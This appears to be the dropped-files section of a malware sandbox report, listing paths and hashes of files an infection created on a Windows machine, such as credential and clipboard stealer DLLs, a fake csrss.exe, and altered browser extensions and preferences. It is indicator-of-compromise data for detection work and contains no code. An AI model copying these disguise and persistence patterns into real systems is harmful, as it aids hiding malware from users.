C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\RW8DX3II\B8BxsscfVBr[1].ico

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\1RQB710T.cookie

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\41R64P61\intersection-observer.min[1].js

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\41R64P61\webcomponents-ce-sd[1].js

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\DRWF1KAS\web-animations-next-lite.min[1].js

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\QWUII5PG\www-i18n-constants[1].js

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\QWUII5PG\www-tampering[1].js

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\QWUII5PG\scheduler[1].js

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\QWUII5PG\spf[1].js

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\QWUII5PG\network[1].js

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\OLDLU5DP\css2[1].css

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\DRWF1KAS\rs=AGKMywF2nbClGl-5_J3GnagT2STDJgq_Zg[1].css

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\OLDLU5DP\www-onepick[1].css

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_43B91371270367D9BB0D22249072D2B2

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_43B91371270367D9BB0D22249072D2B2

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\DRWF1KAS\desktop_polymer_enable_wil_icons[1].js

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\OLDLU5DP\www-main-desktop-home-page-skeleton[1].css

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\41R64P61\KFOlCnqEu92Fr1MmSU5vBg[1].woff2

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\DRWF1KAS\KFOmCnqEu92Fr1Me4A[1].woff2

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\41R64P61\KFOlCnqEu92Fr1MmEU9vBg[1].woff2

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\OLDLU5DP\KFOlCnqEu92Fr1MmWUlvBg[1].woff2

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\41R64P61\www-main-desktop-watch-page-skeleton[1].css

C:\Users\Admin\AppData\Local\Temp\3E1D.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\TCMH1DO0\edgecompatviewlist[1].xml

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

C:\Users\Admin\AppData\Local\Temp\7zSF2C7.tmp\Install.exe

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\V4M6VAOE\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p3kjzebq.amk.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Roaming\iirwube

MD5 2aa70916a47ad55b25b51b15e07ded8e
SHA1 4eac7c1c0af31e01535a895041741f1e250aa034
SHA256 f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512 b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954

C:\Windows\rss\csrss.exe

MD5 1c01927ac6e677d4f277cb9f7648ca70
SHA1 30d980c95b28c4856baef117e228d75e6a25e113
SHA256 c2efd2f57310cfa062ce5bc7bd1e87ef55c50412cf9e48d9765e0c2db08bf60a
SHA512 71989e394718c53042e4bc1242f2281610eea390eade147f248dae0a6b79954013654e8cd824e2f367d414758833aabe36f1581ad9d52e9ee63e905ce4d7473e

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe

MD5 cd3191644eeaab1d1cf9b4bea245f78c
SHA1 75f04b22e62b1366a4c5b2887242b63de1d83c9c
SHA256 f626f7361d341ca2b7c67c2b20ca5ab516a6ce4104048c5a3ee3f2d83cc3039f
SHA512 79ebd59d2f66bf3f4417760ff1c9021b3d0e3dcb65da390bf377c3316ce675add82b79bd90750e9b98f68bd5a5625c2b863fadbd0bf447c372b14a619e43d57a

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 00af039c782049b739f384c1123ddd37
SHA1 1c25763e54cdfc9d0a1f679d43fec22b2f2dd348
SHA256 a6144a35bf64451adaedf009a0188771c30204240de4637a8f29136701cf040a
SHA512 e1a8b942b3a09689f4ef315ec83fa62b777ccad242805c36dcc7023674420804aa3741eba581ec7f9365313a34972df6352c852952d7771705bfd19e64078f0a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5699p0ky.default-release\prefs.js

MD5 d8ca1c5d6532b0e4e9fca77dcad1cf54
SHA1 0dff6759fad3a9f7d86098678122752946c6cc52
SHA256 5886f73c0576a8095eeda79ca377d2da1c16b7db58e40e223c9a13d995d5f249
SHA512 8d12973034267ad75756af4c29d5dd4b1238fba29311d2fa21fee44a9f37efb99e2d6807daa11915ced91536acd52b29015c359344aaf0963815961653242ec9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 84bf890a7d478a64e60fa12d1a315958
SHA1 4450520f7ac40ff43de0f202cddda68cdb0aa87b
SHA256 77f44c1260b7a5ba372e62c4972e23caf2bf84e02f6eb02fee52950b9b503aa4
SHA512 a0f3e2408b54baa60dbc8074c114d4fc27d5733104c079d6f3582e3d6eced12d62ed207b56ea3c3096412abdfb5516c27cac9bb4940e47fb004f484b9c51ab06